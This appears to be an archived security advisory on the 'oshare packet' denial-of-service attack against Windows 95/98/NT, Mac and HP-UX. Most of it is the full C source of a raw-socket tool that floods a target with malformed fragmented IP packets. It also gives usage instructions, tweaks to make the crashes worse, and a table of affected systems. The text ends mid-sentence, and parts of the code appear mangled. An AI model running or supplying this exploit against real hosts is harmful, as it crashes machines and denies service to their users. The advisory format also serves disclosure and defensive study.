

    Windows 9x, NT, Mac


    R00t Zer0 found following.  Windows98 crashed by the packet  which
    added a hand to the value of the IP header of the packet a little.
    (From now, the  packet of this   structure is called  with "oshare
    packet".)    A Macintosh  crashed by  the "oshare  packet" in  the
    same way, too.  But, it isn't realized by this program. It will be
    released soon.

    Reboot  hangs  freely  if  it  becomes  blue screen when Windows98
    receives "oshare packet". When blue screen comes out, the function
    of the  network can't  be used  any more  after it.   The error of
    TCP/IP is started in the  case of the Macintosh, and  the function
    of the network  can't be used  any more (see  below for some  code

    /*      [ oshare_1_gou  ver 0.1 ]  -- Dressing up No.1 --                       */
    /*                                                                              */
    /*                                                                              */
    /*       This program transmits the "oshare" packet which starts a machine aga- */
    /*      in or crash. But, because it can't pass through the router, it can be   */
    /*      carried out only in the same segment.                                   */
    /*       "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha- */
    /*      nged, it has already tested that it becomes possible to kill Mac, too.  */
    /*      -----------------------------------------                               */
    /*      Written by R00t Zer0                                                    */
    /*      E-Mail  :                                             */
    /*      Web URL :                        */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <netdb.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #include <netinet/tcp.h>
    #include <netinet/in_systm.h>
    #include <arpa/inet.h>

    u_short in_cksum( u_short *, int );
    int             send_oshare_packet( int, u_long );

    in_cksum( u_short *addr, int len )
            int             nleft   = len;
            u_short *w              = addr;
            int             sum             = 0;
            u_short answer  = 0;

            while( nleft > 1 )
                    sum += *w++;
                    nleft -= 2;

            if (nleft == 1)
                    *( u_char *)( &answer ) = *( u_char *)w;
                    sum += answer;

            sum      = ( sum >> 16 ) + ( sum & 0xffff );
            sum += ( sum >> 16 );
            answer = ~sum;
            return( answer );

    send_oshare_packet( int sock_send, u_long dst_addr )
            char    *packet;
            int             send_status;
            struct  iphdr           *ip;
            struct  sockaddr_in     to;

            packet  = ( char *)malloc( 40 );
            ip              = ( struct      iphdr *)( packet );
            memset( packet, 0, 40 );

            ip->version             = 4;
            ip->ihl                 = 11;
            ip->tos                 = 0x00;
            ip->tot_len             = htons( 44 );
            ip->id                  = htons( 1999 );
            ip->frag_off    = htons( 16383 );
            ip->ttl                 = 0xff;
            ip->protocol    = IPPROTO_UDP;
            ip->saddr               = htonl( inet_addr( "" ) );
            ip->daddr               = dst_addr;
            ip->check               = in_cksum( ( u_short *)ip, 44 );

            to.sin_family                   = AF_INET;
            to.sin_port                             = htons( 0x123 );
            to.sin_addr.s_addr              = dst_addr;

            send_status = sendto( sock_send, packet, 40, 0,
                                 ( struct sockaddr *)&to, sizeof( struct sockaddr ) );

            free( packet );
            return( send_status );

    main( int argc, char *argv[] )
            char    tmp_buffer[ 1024 ];
            int             loop, loop2;

            int             sock_send;
            u_long  src_addr, dst_addr;
            u_short src_port, dst_port;

            struct  hostent         *host;
            struct  sockaddr_in     addr;

            time_t  t;

            if( argc != 3 )
                    printf( "Usage : %s <dst addr> <num(k)>\n", argv[0] );
                    exit( -1 );

            t = time( 0 );
            srand( ( u_int )t );

            memset( &addr, 0, sizeof( struct sockaddr_in ) );
            addr.sin_family                 = AF_INET;
            addr.sin_addr.s_addr    = inet_addr( argv[1] );
            if( addr.sin_addr.s_addr == -1 )
                    host = gethostbyname( argv[1] );
                    if( host == NULL )
                            printf( "Unknown host %s.\n", argv[1] );
                            exit( -1 );
                    addr.sin_family = host->h_addrtype;
                    memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length );
            memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 );

            if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1)
                    perror( "Getting raw send socket" );
                    exit( -1 );

            printf( "\n\"Oshare Packet\" sending" );
            fflush( stdout );
            for( loop = 0; loop < atoi( argv[2] ); loop++ )
                    for( loop2 = 0; loop2 < 1000; loop2++ )
                            send_oshare_packet( sock_send, dst_addr );
                    fprintf( stderr, "." );
                    fflush( stdout );
            printf( "\n\nDone.\n\n" );
            fflush( stdout );

            close( sock_send );
            exit( 0 );

    And here's little modification in the source. For example...

        ip->ihl         = 22;
        ip->frag_off    = htons( -16383 );

    Compile, and  send heaps  of packets  ('./oshare x.x.x.x  300' for
    example) to local Windows 98/NT box. It should freeze  (literally)
    while packets are travelling.   It recovers after the 'attack'  is
    finished (shouldn't  be a  big problem  to leave  a process in the
    background  that  will  send  packets  forever).   This was tested
    against Windows 98 and Windows NT 4.0 (2 Workstations and 1 Server
    all with SP4 applied, no post SP4 hotfixes).  It will also  affect
    HP-UX  (tested  against  10.20),  but  you  wonn't  get  more than
    "jumping mouse" effect. Load is higher, but machine is functional.
    If you can't maake it work, the cause is thought to be here:

        1)  A difference in the version of OS.
           It works with ja, and it may not work with en.

        2)  Modification of the code.
            When it was rewritten, my acquaintance's machine crashed a
            part.  This modification makes the cause of the bug much
            more vague, Only, by 100 packet.

        ip->ihl = rand() % 16;
        ip->tot_len = rand() % 0xffff;

    More testings  showed something  you may  find interresting.   The
    differences in behavior seem to be due to the type of network card
    installed in the machine.  Here is a VERY small list:

       - win95 is broken and bluescreens all the time.
       - win98 with the following network cards...
         * LinkSys ISA (ne2000 chipset): Spontaneous Reboot.
         * LinkSys PCI (ne2000):         Blue Screen
         * 3c509 (ISA):                  Blue Screen
         * 3c590 (PCI):                  Some Blue Screens, others Hang
         * 3c905 (PCI):                  Hangs   until  packets   stop
                                         comming, then complete wakup.

    Also, Fabio Bastiglia Oliva posted following info.  The table
    below shows the oshare tests results that he made in his network

        S - Frozen until packet stop
        F - Frozen
        B - Blue Screen
        R - Reboot
        AtkSrc (Attack Source):
        L - Linux
        S - SunOS
        F - Full Install
        U1 - Up from Windows 3.xx
        U2 - Up from Windows 95 (4.00.950)
        U3 - Up from Windows 95 (4.00.1111)
        C - Conseal PC Firwall Installed
        Lang (Language):
        E - English
        P - Portuguese
        Test Results:
        |    OS & Version      | Vuln | Effect | AtkSrc |   Info   |    Lang   |
        |Windows 95 4.00.950   | YES  | F B    | L S    | F        | E P       |
        |                      |------+--------+--------+----------+-----------+
        |                      | YES  | F B    | L S    | U1       | E P       |
        |                      |------+--------+--------+----------+-----------+
        |                      | YES  | F B S  | L S    | U1 C     | E P       |
        |Windows 95 4.00.1111  | YES  | F B    | L S    | F        | E P       |
        |        or            |------+--------+--------+----------+-----------+
        |Windows 95 950b       | YES  | F B    | L S    | U1       | E P       |
        |                      |------+--------+--------+----------+-----------+
        |                      | YES  | F B S  | L S    | U1 C     | E P       |
        |Windows 98 4.10.1998  | YES  | R      | L S    | F        | E P       |
        |                      |------+--------+--------+----------+-----------+
        |                      | YES  | F R    | L S    | U2       | E P       |
        |                      |------+--------+--------+----------+-----------+
        |                      | YES  | F R    | L S    | U3       | E P       |
        |                      |------+--------+--------+----------+-----------+
        |                      | YES  | S      | L S    | F  C     | E P       |
        |                      |------+--------+--------+----------+-----------+
        |                      | YES  | S      | L S    | U2 C     | E P       |
        |                      |------+--------+--------+----------+-----------+
        |                      | YES  | S      | L S    | U3 C     | E P       |
        |Windows NT 4 SP4      | NO   |  ---   |  ---   | F        | E         |
        |Windows 2000 Beta     | NO   |  ---   |  ---   | F        | E         |
        |Linux Slackware 2.0.36| NO   |  ---   |  ---   |   ---    |   ---     |

    Multiple acronyms means that the test results are the same or  the
    test generate different/multiple effects in the same system.


    Nothing yet.   SP1 for  Win98 should  address that.   As for   NT,
    there was  only one  post reporting  to be  vulnerable without any